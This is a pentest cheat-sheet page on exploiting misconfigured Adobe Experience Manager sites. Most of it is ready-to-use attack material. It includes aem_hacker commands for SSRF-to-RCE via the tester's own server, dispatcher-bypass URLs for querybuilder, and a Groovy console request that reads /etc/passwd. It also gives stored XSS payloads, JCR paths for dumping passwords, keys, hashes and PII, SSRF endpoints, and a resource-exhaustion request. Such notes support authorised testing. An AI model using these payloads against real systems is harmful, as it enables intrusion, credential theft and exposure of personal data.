aem misconfiguration

Watch Here

  • Collect subdomain

  • Use nuclei/nuclei-templates/technologies/tech-detect.yaml to identify AEM

  • Run Python3 ./aem_hacker.py –u https://example — host localhost

  • Use AEM Paths to fuzz on paths

  • AEM Hacker

  • AEM RCE Bundle

  • python3 aem_hacker.py -u --host yourvpshostname => common usage

  • python3 aem_discovery.py --file urls.txt --workers 150 => discover URLs

  • python3 aem_enum.py --url => automate username and secrets grabbing

  • python3 aem_ssrf2rce.py --url --fakaem yourvps

  • python3 aem_server.py

  • Bypassing CVE-2016-0957

    • https://aemsite/bin/querybuilder.json => blocked

    • https://aemsite/bin/querybuilder.json/a.css => allow

    • https://aemsite/bin/querybuilder.json/a.html => allow

    • https://aemsite/bin/querybuilder.json/a.ico => allow

    • https://aemsite/bin/querybuilder.json/a.png => allow

    • https://aemsite/bin/querybuilder.json;%0aa.css => allow

    • https://aemsite/bin/querybuilder.json/a.1.json => allow

  • Bypassing for interesting servlets

    • https://aemsite/bin/querybuilder.json => blocked

    • https://aemsite/bin/querybuilder.json/a.css => block

    • https://aemsite/bin/querybuilder.json;%0aa.css => block

    • https://aemsite/bin/querybuilder.json.servlet.css => allow

    • https://aemsite/bin/querybuilder.json.servlet.html => allow

    • https://aemsite/bin/querybuilder.json.servlet.ico => allow

    • https://aemsite/bin/querybuilder.json.servlet.png => allow

    • ///etc.json instead of /etc.json

    • ///bin///quesrybuilder.json instead of /bin/quesrybuilder.json

  • SSRF should allow sending GET requests and seeing responses

    • Opensocial proxy

    • SSRF in ReportingServicesProxyServlet (CVE-2018-12809)

  • POST /bin/groovyconsole/post.servlet HTTP/1.1

    • HOST:

    • script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt

  • POST //////content/usergenerated/etc/commerce/smartlists/vv.json

    • aa=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b

  • POST /content/usergenerated/etc/commerce/smartlists/xss

    • aaa.html=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b

  • POST /content/usergenerated/etc/commerce/smartlists/xssed

    • jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b&jcr:mimeType=text/html

  • Everything is stored in the JCR repository:

    • Secrets (passwords, encryption keys, tokens)

    • Configuration

    • PII

    • Usernames

[ ] What to Use

  • DefaultGETServlet

  • QueryBuilderJsonServlet

  • QueryBuilderFeedServlet

  • GQLSearch Servlet

  • Others

  • Allows getting JCR node with its properties

  • Selectors:

    • Tidy

    • Infinity

    • Numeric value: -1, 0, 1...99999

  • Formats:

    • JSON

    • XML

    • RES

  • Example:

    • https://aem.site/tidy.3.json

      • / => jcr

      • tidy => selector tidy

      • 3 => selector depth

      • json => output format

  • How to Grab:

    • Get node names, starting from jcr:root:

      • /.1.json

      • /.ext.json

      • /.childrenlist.json

    • Or guess node names:

      • Common names /content, /home, /var, /etc

    • Dump properties for each child node of jcr:root:

      • /etc.json or /etc.s.json or /etc.-1.json

  • What to Grab:

    • Interesting nodes:

      • /etc => may contain secrets (passwords, encryption keys)

      • /apps/system/config => passwords

      • /apps/<something>/config => passwords

      • /var => may contain private PII

      • /home => password hashes, PII

    • Interesting properties contain AEM usernames:

      • jcr:createdBy

      • jcr:lastModifiedBy

      • cq:LastModifiedBy

  • Path:

    • /bin/querybuilder.json

    • /bin/querybuilder.feed.servlet

  • Examples of Useful Searches:

    • type=nt:file&nodename=*.zip

    • path=/home&p.hits-full&p.limit=-1

    • hasPermission=jcr:write&path=/content

    • hasPermission=jcr:addChildNodes&path=/content

    • hasPermission=jcr:modifyProperties&path=/content

    • p.hits-selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation-unequals&property.value=admin&type=nt%3abase&p.limit=1000

    • path=/etc&path.flat=true&p.nodedepth=0

    • path=/etc/replication/agents.author&p.hits-full&p.nodedepth=-1

  • SSRF via Opensocial Proxy:

    • /libs/opensocial/proxy?container=default&url=http://target

    • /libs/shindig/proxy?container=default&url=http://target

  • SSRF via ReportingServicesProxyServlet (CVE-2018-12809):

    • /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a

    • /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a

    • /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e

  • SSRF via SiteCatalystServlet:

    • /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet

    • /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json

  • /.ext.infinity.json

  • /.ext.infinity.json?tidy=true

  • /bin/querybuilder.json?type=nt:base&p.limit=-1

  • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=

  • /content.assetsearch.json?query=*&start=0&limit=10&random=123

  • /..assetsearch.json?query=*&start=0&limit=10&random=123

  • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111

Previousmass assignmentNextATO

Last updated